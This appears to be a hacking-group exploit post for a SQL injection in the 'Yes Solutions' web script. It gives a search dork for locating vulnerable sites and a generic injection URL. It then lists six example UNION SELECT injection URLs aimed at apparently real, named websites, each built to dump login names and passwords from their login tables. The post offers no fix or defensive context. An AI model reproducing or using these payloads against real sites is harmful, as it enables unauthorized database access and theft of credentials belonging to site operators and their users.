Yes Solutions suffers from a remote SQL injection vulnerability.
fa8362ac6b7518d3a13e2040e7c0eb6ca591065b14ae08bca687fc272e75afe4
####################################################################
.:. Author : HackXBack [h-b@usa.com] Lebanese Hacker
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : YES SOLUTIONS
.:. Bug Type : Sql Injection
.:. Dork : "Powered by: Yes Solutions"
####################################################################
===[ Exploit ]===
http://server/path/file.php?id=null[SQL]
===[ Example ]===
http://www.bitmu.com/files/services.php?id=-34%20union%20select%201,2,concat%28login,0x3a,password%29,4,5,6+from+login_table+where%20login_id=1
http://www.efois.com/latest_news.php?id=-3%20union%20select%201,group_concat%28username,0x3a,password%29,3,4,5,6,7,8+from+login
http://www.skincarenwellness.com/files/company.php?cat_id=-2%20union%20select%201,group_concat%28Login_Name,0x3a,Password%29,3,4,5,6,7,8+from+login_table
http://www.skbl.biz/files/product_detail.php?item_id=-122%20union%20select%201,2,3,group_concat%28Login_Name,0x3a,Password%29,5,6,7,8,9+from+login_table
http://www.autopalaceltd.com/files/product.php?cat_id=-29 union select 1,group_concat(login,0x3a,password),3,4,5,6,7+from+login_table
http://www.forexdirectmauritius.com/files/detail.php?id=34&page_id=-3%20union%20select%201,group_concat%28login,0x3a,password%29,3,4,5,6+from+login_table
####################################################################
Greats T0: AtT4CKxT3rR0r1ST & All Member Sec Attack